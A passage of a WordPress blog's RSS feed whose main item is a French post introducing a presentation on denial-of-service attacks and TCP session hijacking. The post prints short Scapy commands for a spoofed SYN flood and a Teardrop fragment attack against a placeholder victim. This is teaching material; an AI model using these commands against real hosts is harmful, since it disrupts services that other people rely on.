<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/electronicedencreationkit.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/electronicedencreationkit.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=14&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2008/08/01/google-403-forbidden/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>

		<media:content url="http://electronicedencreationkit.files.wordpress.com/2008/08/403google.jpg?w=300" medium="image">
			<media:title type="html">google_403_forbidden</media:title>
		</media:content>
	</item>
		<item>
		<title>[FR]Déni de service et usurpation d&#8217;identité [présentation]</title>
		<link>http://electronicedencreationkit.wordpress.com/2008/01/02/frdeni-de-service-et-usurpation-didentite-presentation/</link>
		<comments>http://electronicedencreationkit.wordpress.com/2008/01/02/frdeni-de-service-et-usurpation-didentite-presentation/#comments</comments>
		<pubDate>Wed, 02 Jan 2008 13:56:13 +0000</pubDate>
		<dc:creator>gsurang</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://electronicedencreationkit.wordpress.com/?p=3</guid>
		<description><![CDATA[* Présentation PDF [DoS et usurpation d’ identite] Contenu de la présentation: Dénis de service: Tcp Syn Land Teardrop Smurf Ping de la mort Vol de session: Tcp hijacking * Téléchargement des codes sources des attaques : à venir! Prérequis : python , dpkt * Mise en oeuvre des attaques avec Scapy _ Syn Flood: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=3&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>* Présentation PDF [<a title="DoS et usurpation d’ identite" href="http://eeck.free.fr/wordpress/wp-content/dos-usurpationid.pdf">DoS et usurpation d’ identite</a>]</p>
<p>Contenu de la présentation:</p>
<blockquote><p>Dénis de service:</p></blockquote>
<ol>
<li>Tcp Syn</li>
<li>Land</li>
<li>Teardrop</li>
<li>Smurf</li>
<li>Ping de la mort</li>
</ol>
<blockquote><p>Vol de session:</p></blockquote>
<ol>
<li>Tcp hijacking</li>
</ol>
<p>* Téléchargement des codes sources des attaques : à venir!</p>
<p>Prérequis : <a href="http://www.python.org/download/" target="_blank">python</a> , <a href="http://code.google.com/p/dpkt/downloads/list" target="_blank">dpkt</a></p>
<p>* Mise en oeuvre des attaques avec<a href="http://www.secdev.org" target="_blank"> Scapy</a></p>
<p>_ Syn Flood:</p>
<blockquote><p>&gt;&gt;&gt;p=IP(dst=&nbsp;&raquo;VICTIM&nbsp;&raquo;,src=&nbsp;&raquo;INEXISTANTE STATION&nbsp;&raquo;)/TCP(dport=80,sport=range(10,10000),flags=02)<br />
&gt;&gt;&gt;[i for i in p]<br />
&gt;&gt;&gt;srflood(p)</p></blockquote>
<p>_ Teardrop:</p>
<blockquote><p>send(IP(dst=&nbsp;&raquo;VICTIM&nbsp;&raquo;, id=42, flags=&nbsp;&raquo;MF&nbsp;&raquo;)/UDP()/(&laquo;&nbsp;X&nbsp;&raquo;*10))<br />
send(IP(dst=&nbsp;&raquo;VICTIM&nbsp;&raquo;, id=42, frag=48)/(&laquo;&nbsp;X&nbsp;&raquo;*116))<br />
send(IP(dst=&nbsp;&raquo;VICTIM&nbsp;&raquo;, id=42, flags=&nbsp;&raquo;MF&nbsp;&raquo;)/UDP()/(&laquo;&nbsp;X&nbsp;&raquo;*224))</p></blockquote>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/electronicedencreationkit.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/electronicedencreationkit.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/electronicedencreationkit.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/electronicedencreationkit.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/electronicedencreationkit.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/electronicedencreationkit.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/electronicedencreationkit.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/electronicedencreationkit.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/electronicedencreationkit.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/electronicedencreationkit.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=electronicedencreationkit.wordpress.com&amp;blog=4386396&amp;post=3&amp;subd=electronicedencreationkit&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://electronicedencreationkit.wordpress.com/2008/01/02/frdeni-de-service-et-usurpation-didentite-presentation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/70cbc8a270220b408d17ecca9e1747c3?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">gsurang</media:title>
		</media:content>
	</item>
	</channel>
</rss>
